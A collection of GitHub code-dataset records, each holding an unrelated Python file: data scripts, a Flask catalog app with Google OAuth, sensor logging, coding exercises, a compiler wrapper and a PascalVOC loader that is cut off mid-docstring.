+{"seq_id":"22775519141","text":"import multiprocessing as mp\nimport pandas as pd\nimport locale\nimport sys\nfrom pathlib import Path\n\nsys.path.insert(0, str(Path(__file__).resolve().parent.parent))\n\nfrom src.api import get_audio_metadata\nfrom src.data import coalesce_columns\nfrom tqdm.contrib.concurrent import process_map # multiprocessing from tqdm\n\nlocale.setlocale(locale.LC_ALL, \"sv_SE.UTF-8\") # Swedish date format\n\ndf = pd.read_parquet(\"data/df_anforanden_metadata.parquet\")\ndf = df[~pd.isna(df[\"rel_dok_id\"])].reset_index(drop=True)\n\n# Some anforanden have multiple rel_dok_ids, we select the first one\nfirst_rel_dok_id = df[df[\"rel_dok_id\"].str.contains(\",\")][\"rel_dok_id\"].str.extract(\"(.*?)(?=, )\")\ndf.loc[df[\"rel_dok_id\"].str.contains(\",\"), \"rel_dok_id\"] = first_rel_dok_id.iloc[:, 0].tolist()\n\n# Downlaod audio metadata from unique rel_dok_ids (debates)\ndf_list = process_map(\n get_audio_metadata,\n df[\"rel_dok_id\"].unique().tolist(),\n max_workers=mp.cpu_count(),\n chunksize=20,\n)\n\ndf_audiometa = pd.concat(df_list, axis=0)\ndf_audiometa = df_audiometa.reset_index(drop=True)\ndf_audiometa[\"debatedate\"] = pd.to_datetime(df_audiometa[\"debatedate\"], format=\"%d %B %Y\")\ndf_audiometa.loc[df_audiometa[\"anftext\"] == \"\", \"anftext\"] = None\n\n# # Add direct timestamped link to webb-tv to start video where a speech begins\n# df_audiometa[\"debateurl_timestamp\"] = (\n# \"https://www.riksdagen.se/views/pages/embedpage.aspx?did=\"\n# + df_audiometa[\"dokid\"]\n# + \"&start=\"\n# + df_audiometa[\"start\"].astype(str)\n# + \"&end=\"\n# + (df_audiometa[\"start\"] + df_audiometa[\"duration\"]).astype(str)\n# )\n\n\n# Some speech texts are missing from audio metadata, we add them from df_anforanden_metadata\ndf_audiometa = df_audiometa.rename(columns={\"number\": \"anforande_nummer\"})\n\ndf_audiometa = df_audiometa.merge(\n df[[\"rel_dok_id\", \"anforande_nummer\", \"anforandetext\", \"talare\", \"intressent_id\"]],\n left_on=[\"rel_dok_id\", \"anforande_nummer\"],\n right_on=[\"rel_dok_id\", \"anforande_nummer\"],\n how=\"left\",\n)\n\n# Uppercase all names/party names because they are inconsistent in the data\ndf_audiometa[\"text\"] = df_audiometa[\"text\"].str.upper()\ndf_audiometa[\"talare\"] = df_audiometa[\"talare\"].str.upper()\n\n# Replace NaN in anftext column with text from anforandetext\ndf_audiometa = coalesce_columns(df_audiometa, col1=\"anftext\", col2=\"anforandetext\")\n# Drop any duplicates\ndf_audiometa = df_audiometa[~df_audiometa.duplicated(keep=\"first\")].reset_index(drop=True)\n# Drop speeches with no text\ndf_audiometa = df_audiometa[~df_audiometa[\"anftext\"].isna()].reset_index(drop=True)\n\ndf_audiometa.to_parquet(\"data/df_audio_metadata.parquet\", index=False)\n","repo_name":"kb-labb/riksdagen_anforanden","sub_path":"scripts/download_audio_metadata.py","file_name":"download_audio_metadata.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
+{"seq_id":"4199086520","text":"import win32com.client\nimport sys\n\ndef write_to_access(final):\n #数据库名和表名\n db_name=\"./第1套-庄老师.mdb\"\n tb_name=\"第1套-庄\"\n #连接数据库\n conn = win32com.client.gencache.EnsureDispatch('ADODB.Connection') \n DSN = 'PROVIDER = Microsoft.ACE.OLEDB.12.0;DATA SOURCE =%s;' %(db_name)\n conn.Open(DSN)\n #数据库表访问\n rs = win32com.client.Dispatch(r'ADODB.Recordset') \n rs.Open('[' + tb_name + ']', conn, 1, 3) # 不允许更新,用于查询\n \n\n #查询与更新 \n rs.MoveFirst()\n idx=0\n while True:\n if rs.EOF:\n break\n else:\n idx+=1\n sid=rs.Fields.Item(0).Value\n if sid in final:\n rs.Fields.Item(7).Value=final[sid][2]\n rs.Fields.Item(8).Value=final[sid][3]\n rs.Fields.Item(9).Value=final[sid][0]\n rs.Fields.Item(10).Value=final[sid][1]\n rs.Update()\n rs.MoveNext()\n else:\n print(\"erro!\\n\")\n sys.exit(0) \n \ndef getDict():\n rst={}\n f=open(\"log.txt\",\"r\")\n for line in f:\n x=line.split(\" \")\n sid = x[0]\n prob = x[1]\n score= int(float(x[2]))\n if sid not in rst:\n rst[sid]=[]\n rst[sid].append(score) \n f.close()\n return rst\n \nfinal=getDict()\nwrite_to_access(final) ","repo_name":"mrlantin/others","sub_path":"VB作业/期末考试/ac.py","file_name":"ac.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31981255788","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.readlines()[1]\n\nsetup(name='seqlearner',\n version='0.0.7',\n description='The multitask learning package for semi-supervised learning on biological sequences',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/EliHei/SeqLearner',\n author='Elyas Heidari, Mohsen Naghipourfar',\n author_email='almasmadani@gmail.com, mn7697np@gmail.com',\n license='MIT',\n packages=find_packages(),\n zip_safe=False,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n )\n","repo_name":"EliHei/SeqLearn","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
+{"seq_id":"32705366221","text":"#!/usr/bin/python3.6\nimport json\nimport random\nimport requests\nimport string\nimport httplib2\nfrom flask import Flask, render_template, request, redirect, jsonify, url_for, flash, make_response\nfrom oauth2client.client import flow_from_clientsecrets, FlowExchangeError\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Base, User, Categories, Items\nfrom flask import session as login_session\n\napp = Flask(__name__)\n# Read secret json file for access account\nCLIENT_ID = json.loads(open('catalog_secret.json', 'r').read())[\n 'web']['client_id']\nprint(\"Client id :{}\".format(CLIENT_ID))\n# implement database connection\nengine = create_engine(\"sqlite:///catalogApp.db\")\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n# ======================JSON==============================\n@app.route('/categories/json')\ndef all_categories_json():\n cates = session.query(Categories).all()\n categories_json = [cate.serialize for cate in cates]\n for category in categories_json:\n items = session.query(Items).filter_by(cate_id=category['id']).all()\n items_json = [item.serialize for item in items]\n if items_json:\n category['items'] = items_json\n return jsonify(categories_json)\n\n\n# ========================================================\n@app.route('/')\n@app.route('/catalog')\ndef all_catalog():\n categories = session.query(Categories).all()\n items = session.query(Items).all()\n return render_template('catalog.html', categories=categories, items=items)\n\n\n@app.route('/catalog//items')\ndef items_per_category(category_name):\n categories = session.query(Categories).all()\n category = session.query(Categories).filter_by(name=category_name).one()\n print(category.name)\n if category:\n items = session.query(Items).filter_by(cate_id=category.id).all()\n print([item.name for item in items])\n return render_template('items_per_catalog.html',\n categories=categories,\n selected_category=category,\n items=items)\n\n\n@app.route('/catalog//')\ndef item_description(category_name, item_name):\n category = session.query(Categories).filter_by(name=category_name).first()\n print(category_name)\n if category:\n item = session.query(Items).filter_by(\n cate_id=category.id, name=item_name).first()\n if item:\n return render_template('item_description.html', category=category, item=item)\n else:\n return \"No description for this item\"\n else:\n return \"we can't find your category\"\n\n\n# worked and need to add login session\n@app.route('/catalog/new_item', methods=['GET', 'POST'])\ndef add_new_item():\n categories = session.query(Categories).all()\n if 'username' not in login_session:\n return redirect('/login')\n if request.method == \"POST\":\n new_item = Items(cate_id=request.form['category_id'],\n name=request.form['title'],\n description=request.form['description'])\n session.add(new_item)\n session.commit()\n return redirect(url_for(\"all_catalog\"))\n else:\n return render_template(\"add_item.html\", categories=categories)\n\n\n# worked and need to add login session and form\n@app.route('/catalog///edit', methods=['GET', 'POST'])\ndef update_item(category_name, item_name):\n allCategory = session.query(Categories).all()\n category = session.query(Categories).filter_by(name=category_name).one()\n if 'username' not in login_session:\n return redirect('/login')\n item = session.query(Items).filter_by(\n cate_id=category.id, name=item_name).one()\n print(item.name, 
item.description)\n if request.method == \"POST\":\n if category.user_id !=login_session['user_id']:\n return \"\"\n else:\n if request.form['title']:\n item.name = request.form['title']\n if request.form['description']:\n item.description = request.form['description']\n if request.form['category_id']:\n item.cate_id = request.form['category_id']\n session.add(item)\n session.commit()\n return redirect(url_for(\"all_catalog\"))\n else:\n return render_template(\"edit_item.html\", item=item, categories=allCategory)\n\n\n@app.route('/catalog///delete', methods=['GET', 'POST'])\ndef delete_item(category_name, item_name):\n category = session.query(Categories).filter_by(name=category_name).one()\n item = session.query(Items).filter_by(cate_id=category.id, name=item_name).one()\n if 'username' not in login_session:\n return redirect('/login')\n if request.method == \"POST\":\n if category.user_id !=login_session['user_id']:\n return \"\"\n else:\n session.delete(item)\n session.commit()\n return redirect(url_for(\"all_catalog\"))\n else:\n return render_template(\"delete_item.html\", item=item)\n \n\n\n# =========================================================\n@app.route('/login')\ndef show_login():\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n login_session['state'] = state\n print(\"login session : {}\".format(login_session['state']))\n return render_template(\"login.html\", STATE=state)\n\n\ndef get_user_id(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\ndef get_user_info(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef create_user(loginsession):\n newUser = User(name=loginsession['username'],\n email=loginsession['email'],\n )\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=loginsession['email']).one()\n return user.id\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # Validate state token\n print(\"Resquest args:\", request.args.get('state'))\n print(\"login session :\", login_session['state'])\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('catalog_secret.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(json.dumps(\n 'Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n print(\"access token:\", access_token)\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token={}'.format(access_token))\n print(\"url :\", url)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n print(\"gplus :\", gplus_id)\n if result['user_id'] != 
gplus_id:\n response = make_response(json.dumps(\n \"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(json.dumps(\n \"Token's client ID does not match app's.\"), 401)\n print(\"Token's client ID does not match app's.\")\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(json.dumps(\n 'Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n login_session['provider'] = 'google'\n login_session['username'] = data['name']\n login_session['email'] = data['email']\n user_id = get_user_id(login_session['email'])\n if not user_id:\n user_id = create_user(login_session)\n login_session['user_id'] = user_id\n\n output = ''\n output += 'Welcome, '\n output += login_session['username']\n output += '! '\n flash(\"you are now logged in as %s\" % login_session['username'])\n print(\"done!\")\n return output\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n access_token = login_session.get('access_token')\n if access_token is None:\n response = make_response(json.dumps(\n 'Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % login_session['access_token']\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n if result['status'] == '200':\n del login_session['access_token']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n response = make_response(json.dumps('Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return redirect(url_for('all_catalog'))\n else:\n response = make_response(json.dumps(\n 'Failed to revoke token for given user.', 400))\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\nif __name__ == \"__main__\":\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='localhost', port=5000)\n","repo_name":"AhmedMohamedTalaat/Catalog-App","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":11339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71660980390","text":"# Ref: http://www.petercollingridge.co.uk/tools/drawsvgpy/\n# \nimport drawSvg as draw\n\nd = draw.Drawing(200, 100, origin='center')\n\nd.append(draw.Lines(-80, -45,\n 70, -49,\n 95, 49,\n -90, 40,\n close=False,\n fill='#eeee00',\n stroke='black'))\n\nd.append(draw.Rectangle(0,0,40,50, fill='#1248ff'))\nd.append(draw.Circle(-40, -10, 30,\n fill='red', stroke_width=2, stroke='black'))\n\np = draw.Path(stroke_width=2, stroke='green',\n fill='black', fill_opacity=0.5)\np.M(-30,5) # Start path at point (-30, 5)\np.l(60,30) # Draw line to (60, 30)\np.h(-70) # Draw horizontal line to x=-70\np.Z() # Draw line to start\nd.append(p)\n\nd.append(draw.ArcLine(60,-20,20,60,270,\n stroke='red', stroke_width=5, fill='red', fill_opacity=0.2))\nd.append(draw.Arc(60,-20,20,60,270,cw=False,\n stroke='green', stroke_width=3, fill='none'))\nd.append(draw.Arc(60,-20,20,270,60,cw=True,\n stroke='blue', stroke_width=1, fill='black', fill_opacity=0.3))\n\nd.setPixelScale(2) # Set number of pixels per geometry unit\n#d.setRenderSize(400,200) # Alternative to setPixelScale\nd.saveSvg('example.svg')\nd.savePng('example.png')\n\n# Display in iPython notebook\nd.rasterize() # Display as PNG\nprint(d) # Display as SVG\n","repo_name":"yogeshhk/MidcurveNN","sub_path":"References/code/reference_drawSvg_test.py","file_name":"reference_drawSvg_test.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"71"}
+{"seq_id":"38739767896","text":"#!/usr/bin/env python\n\nfrom array import array\nimport os\nimport Adafruit_BMP.BMP085 as BMP085\n\ndir_name = os.path.dirname(os.path.realpath(__file__)) + '/data/'\n\ndef get_data():\n sensor = BMP085.BMP085(mode=BMP085.BMP085_ULTRAHIGHRES)\n temperature = sensor.read_temperature()\n pressure = sensor.read_pressure() / 100.0 # conversion to hPa\n return temperature, pressure\n\ndef write_value_to_file(file_name, value):\n with open(file_name, 'ab') as file:\n float_array = array('d', [value])\n float_array.tofile(file)\n\nif __name__ == '__main__':\n temp, pressure = get_data()\n write_value_to_file(dir_name + 'temp.bin', temp)\n write_value_to_file(dir_name + 'pressure.bin', pressure)\n\n","repo_name":"daunator/pressurelogwithupload","sub_path":"gather_data.py","file_name":"gather_data.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74610133030","text":"print(\"\"\"\r\n1'den 1000'e kadar olan sayılardan mükemmel sayı olanları ekrana yazdırın. Bunun için bir sayının mükemmel olup olmadığını\r\n dönen bir tane fonksiyon yazın.\r\n\r\nBir sayının bölenlerinin toplamı kendine eşitse bu sayı mükemmel bir sayıdır. Örnek olarak 6 mükemmel bir sayıdır (1 + 2 + 3 = 6).\r\nÇIKIŞ İÇİN q YA BASIN!!!\r\n\"\"\")\r\n\r\ndef mukemmel_Sayı(sayı):\r\n toplam = 0\r\n for i in range(1,sayı):\r\n if(sayı%i==0):\r\n toplam+=i\r\n if(toplam==sayı):\r\n return True\r\n else:\r\n return False\r\n\r\nwhile True:\r\n sayı=input(\"Sayı giriniz:\")\r\n if (sayı == \"q\"):\r\n print(\"Çıkış yapıldı..\")\r\n break\r\n else:\r\n sayı = int(sayı)\r\n print(mukemmel_Sayı(sayı))","repo_name":"EbruSomuncu/Python","sub_path":"Bölüm4/Fonksiyonlar/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24584460663","text":"from typing import List\nimport collections\n\nclass Solution:\n def groupThePeople(self, groupSizes: List[int]) -> List[List[int]]:\n groups = collections.defaultdict(list)\n res = []\n\n for i, size in enumerate(groupSizes):\n groups[size].append(i)\n \n for size in groups:\n res.extend(groups[size][i: i + size] for i in range(0, len(groups[size]), size))\n \n return res\n\n\ndef main():\n sol = Solution()\n print(sol.groupThePeople([3,3,3,3,3,1,3]))\n print(sol.groupThePeople([2,1,3,3,3,2]))\n\nif __name__ == '__main__':\n main()","repo_name":"brandoneng000/LeetCode","sub_path":"medium/1282.py","file_name":"1282.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"28871691109","text":"from inspect import iscoroutinefunction\nfrom typing import List\n\nfrom fastack import Fastack\nfrom fastack.utils import import_attr\nfrom starlette.datastructures import State\n\nfrom fastack_cache.backends.base import BaseCacheBackend\nfrom fastack_cache.backends.dummy import DummyBackend\nfrom fastack_cache.serializers.base import BaseSerializer\n\n\ndef setup(app: Fastack):\n def on_startup():\n caches = {}\n caches_settings = getattr(app.state.settings, \"CACHES\", {})\n for name, cache_config in caches_settings.items():\n serializer_settings = cache_config.get(\"SERIALIZER\", {})\n serializer_class = serializer_settings.get(\n \"CLASS\", \"fastack_cache.serializers.PickleSerializer\"\n )\n serializer_options = serializer_settings.get(\"OPTIONS\", {})\n try:\n serializer_class: BaseSerializer = import_attr(serializer_class)\n except ImportError as e:\n raise ImportError(\n f\"Could not import serializer class {serializer_class}\"\n ) from e\n\n serializer = serializer_class(\n serializer_options.get(\"DUMPS\", {}),\n serializer_options.get(\"LOADS\", {}),\n )\n backend = cache_config.get(\"BACKEND\")\n if not backend:\n raise RuntimeError('No backend specified for cache \"{}\"'.format(name))\n\n try:\n backend = import_attr(backend)\n except ImportError as e:\n raise RuntimeError(\n 'Could not import cache backend \"{}\"'.format(backend)\n ) from e\n\n options = cache_config.get(\"OPTIONS\", {})\n backend = backend(serializer, **options)\n caches[name] = backend\n\n app.state.caches = State(caches)\n default_cache = caches.get(\"default\")\n if not default_cache:\n default_cache = DummyBackend(None)\n\n app.state.cache = default_cache\n\n async def on_shutdown():\n caches: List[BaseCacheBackend] = app.state.caches._state.values()\n for cache in caches:\n method = cache.disconnect\n if iscoroutinefunction(method):\n await method()\n else:\n method()\n\n app.add_event_handler(\"startup\", on_startup)\n app.add_event_handler(\"shutdown\", on_shutdown)\n","repo_name":"fastack-dev/fastack-cache","sub_path":"fastack_cache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4125412709","text":"import logging\nimport sys\nimport uuid\n\nimport trio\nimport zmq\nimport zmq.asyncio\nfrom network.beacon import Beacon\nfrom network.utils import get_ip\n\nimport clover_swarm.containers as containers\n\n# from clover_swarm import error\n\n# from clover_swarm.containers import AgentContainer\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.DEBUG)\n\n\n# class ConnectedPeer:\n# expires_at = None\n#\n# def __init__(self, uuid):\n# self.addr = None\n# self.uuid = uuid\n# self.heartbeat = None\n# self.dealer = None\n#\n# def is_alive(self):\n# \"\"\"\n# Resets the peers expiry time\n# \"\"\"\n# self.expires_at = time.time() + 5\n\n\nclass Agent:\n def __init__(self, port: int = None, name: str = None, beacon=Beacon, ctx=None):\n\n self.port = port\n self.host = None\n self.uuid = uuid.uuid4()\n self.name = name or self.uuid.hex[:8]\n\n self.running = False\n self.start_stop_lock = trio.Lock()\n\n self.ctx = ctx or zmq.Context.instance()\n self.beacon = beacon(self)\n # self.router =\n self.peers = {}\n\n def __str__(self):\n return f\"\"\n\n def __hash__(self):\n return hash(self.uuid)\n\n async def start(self):\n async with self.start_stop_lock:\n if self.running:\n raise RuntimeError(\"Agent already running\")\n logger.debug(f\"Starting {self}\")\n\n self.host = await get_ip()\n await self.beacon.start()\n\n logger.info(f\"Started {self}\")\n\n async def stop(self):\n logger.debug(f\"Stopping {self}\")\n\n logger.info(f\"Stopped {self}\")\n\n async def start_beacon(self):\n logger.debug(f\"Starting beacon of {self}\")\n\n async def stop_beacon(self):\n logger.debug(f\"Stopping beacon of {self}\")\n\n\nif __name__ == \"__main__\":\n container = containers.AgentContainer()\n container.wire(modules=[sys.modules[__name__]])\n\n agent = container.agent()\n trio.run(agent.start)\n","repo_name":"artem30801/clover-swarm","sub_path":"clover_swarm/network/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22034060902","text":"import os\nimport subprocess\nimport io\nimport re\nimport shutil\n\nfrom tools.logger import init_console_logger\n\nTHIS_PATH = os.path.abspath(os.path.dirname(__file__))\nCRAM_DIR_PATH = os.path.abspath(os.path.join(THIS_PATH, \"..\", \"CRAM\"))\nCOMPILE_BAT_PATH = os.path.abspath(os.path.join(THIS_PATH, \"compile.bat\"))\n\n\ndef cosmic_compile(c_file_path, logger=init_console_logger(name=\"cosmic_compile\")):\n \"\"\"\n Compiles using the cosmic compiler.\n \"\"\"\n # checks\n assert(os.path.isfile(c_file_path))\n assert(\".c\" == c_file_path[-2:])\n logger.info(\"Compiling...\")\n\n # clean old header files\n logger.info(\"Cleaning old header files...\")\n previous_h_files = [_ for _ in os.listdir(CRAM_DIR_PATH) if _[-2:] == \".h\"]\n for f in previous_h_files:\n try:\n os.remove(os.path.join(CRAM_DIR_PATH, f))\n except Exception as e:\n logger.warning(\"Failed to clean old header files: '{}' could not be deleted: {}\".format(f, e))\n\n # collect source header files\n with open(c_file_path, \"r\") as f:\n lines = f.read()\n local_includes = re.findall(r\"#include\\s{0,1}\\\".+[^\\s]\\\"\", lines)\n h_filenames = [_[8:].replace('\"', '').replace(' ', '') for _ in local_includes]\n\n # copy source header files\n source_dir_path = os.path.join(os.path.dirname(c_file_path))\n for h_filename in h_filenames:\n src = os.path.join(source_dir_path, h_filename)\n dst = os.path.join(CRAM_DIR_PATH, h_filename)\n try:\n logger.info(\"Copying header file '{}' to '{}' ...\".format(src, dst))\n shutil.copyfile(src, dst)\n except IOError as e:\n logger.error(\"Header file '{}' was not found. Compilation failed. Error message: {}\".format(h_filename, e))\n logger.error(\"Compilation failed\")\n return\n\n # compile\n command = r'\"{}\" \"{}\" \"{}\"'.format(COMPILE_BAT_PATH, CRAM_DIR_PATH, c_file_path)\n logger.debug(\"Executing command: {}\".format(command))\n p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n std_reader = io.TextIOWrapper(p.stdout, encoding='utf8')\n err_reader = io.TextIOWrapper(p.stderr, encoding='utf8')\n\n while True:\n # read outputs\n s_out = std_reader.readline().rstrip()\n e_out = err_reader.readline().rstrip()\n\n # output std output text\n if s_out != '':\n logger.info(s_out)\n\n # error occurred\n elif e_out != '':\n # output entire error then return 1\n while e_out != '':\n logger.error(e_out)\n e_out = err_reader.readline().rstrip()\n logger.error(\"Compilation failed\")\n return 1\n\n # process finished\n elif p.poll() is not None:\n logger.info(\"Compilation successful\")\n return 0\n\n\nif __name__ == \"__main__\":\n exit(cram_compile(os.path.abspath(os.path.join(THIS_PATH, \"..\", \"CRAM\", \"blank.c\"))))\n","repo_name":"dev-chip/EasyBoard","sub_path":"program_files/core/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35040611709","text":"'''\n可序列化的数据类型\nnumber\nstr\nlist\ntuple\n** dict\n'''\n'''\njson模块\n 参数名 参数 介绍 举例 返回值\n dumps obj 对象序列化 json.dumps([1,2]) json字符串\n loads str 反序列化 json.loads('[1,2]') 原始数据类型\n'''\n'''\npickle模块\n方法名 参数 介绍 举例 返回值\ndumps obj 对象序列化 pickle.dumps([1,2]) 比特\nloads byte 反序列化 pickle.loads('[1,2,3]') 原始数据类型\n'''\nimport json\ndef read(path):\n with open(path,'r') as f:\n data = f.read()\n return json.loads(data)\n\ndef write(path,data):\n with open(path,'w',encoding='utf-8') as f:\n if isinstance(data,dict):\n _data = json.dumps(data)\n f.write(_data)\n else:\n raise TypeError('data is not dict')\n return True\n\ndata = {'name':'曾丽文','age':18}\nif __name__ == '__main__':\n write('test.json',data)\n data = read('test.json')\n print(data)","repo_name":"zlw1115/Python_Program","sub_path":"12文件操作/03序列化.py","file_name":"03序列化.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"19437863978","text":"import requests\nfrom selenium import webdriver\nimport time\n\nurl = 'http://192.168.0.1'\nheaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'ecos_pw=1qw:language=cn; bLanguage=cn',\n 'DNT': '1',\n 'Host': '192.168.0.1',\n 'If-Modified-Since': 'Thu Jan 01 00:00:00 1970',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36'\n}\n\ndrive = webdriver.Chrome()\ndrive.get(url)\ntime.sleep(5)\nprint(drive.find_element_by_id('statusWanIP'))\ntime.sleep(10)\ndrive.quit()\na = requests.get(url, headers=headers)\na.encoding = a.apparent_encoding\nprint(a.text)","repo_name":"TanMengyuan/web_spider","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4661696490","text":"import argparse\nimport xml.etree.ElementTree as ET\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\nfrom transforms import get_transforms\nfrom utils import utils\n\n\nclass PascalVOC(Dataset):\n def __init__(self, dir_root: Path, transform=None ):\n\n dir_img = dir_root / Path(\"VOCdevkit/VOC2007/JPEGImages\")\n dir_label = dir_root / Path(\"VOCdevkit/VOC2007/Annotations\")\n self.list_imgs = self.get_image_list(dir_img)\n self.list_labels = self.get_label_list(dir_label)\n num_imgs = len(self.list_imgs)\n num_labels = len(self.list_labels)\n if num_imgs != num_labels:\n raise ValueError(f\"Num of images ({num_imgs}) is not equal to num of labels ({num_labels}) \"\n f\"in dataset.\\n dir_img: {dir_img}\\ndir_label: {dir_label}\")\n\n self.transform = transform\n self.class_dict_reverse = {\n 0: \"background\",\n 1: \"aeroplane\",\n 2: \"bicycle\",\n 3: \"bird\",\n 4: \"boat\",\n 5: \"bottle\",\n 6: \"bus\",\n 7: \"car\",\n 8: \"cat\",\n 9: \"chair\",\n 10: \"cow\",\n 11: \"diningtable\",\n 12: \"dog\",\n 13: \"horse\",\n 14: \"motorbike\",\n 15: \"person\",\n 16: \"pottedplant\",\n 17: \"sheep\",\n 18: \"sofa\",\n 19: \"train\",\n 20: \"tvmonitor\"\n }\n\n self.class_dict = {\n \"background\": 0,\n \"aeroplane\": 1,\n \"bicycle\": 2,\n \"bird\": 3,\n \"boat\": 4,\n \"bottle\": 5,\n \"bus\": 6,\n \"car\": 7,\n \"cat\": 8,\n \"chair\": 9,\n \"cow\": 10,\n \"diningtable\": 11,\n \"dog\": 12,\n \"horse\": 13,\n \"motorbike\": 14,\n \"person\": 15,\n \"pottedplant\": 16,\n \"sheep\": 17,\n \"sofa\": 18,\n \"train\": 19,\n \"tvmonitor\": 20\n }\n\n def __len__(self):\n return len(self.list_labels)\n\n def __getitem__(self, index):\n \"\"\"Return image, label\n Args:\n index: index of img/label to extract\n\n Returns:\n Tensor: image. Shape=[H, W, 3]\n Tensor: label. Shape=[N, 5] (cls_id, x, y, w, h). Bounding boxes in format x,y,w,h in relative coords.\n\n Notes:\n The collate fn converts label to [N, 6] shape, by concatenating all the labels along the 0th axis. It also\n adds a new element to 1st axis, for image id. 
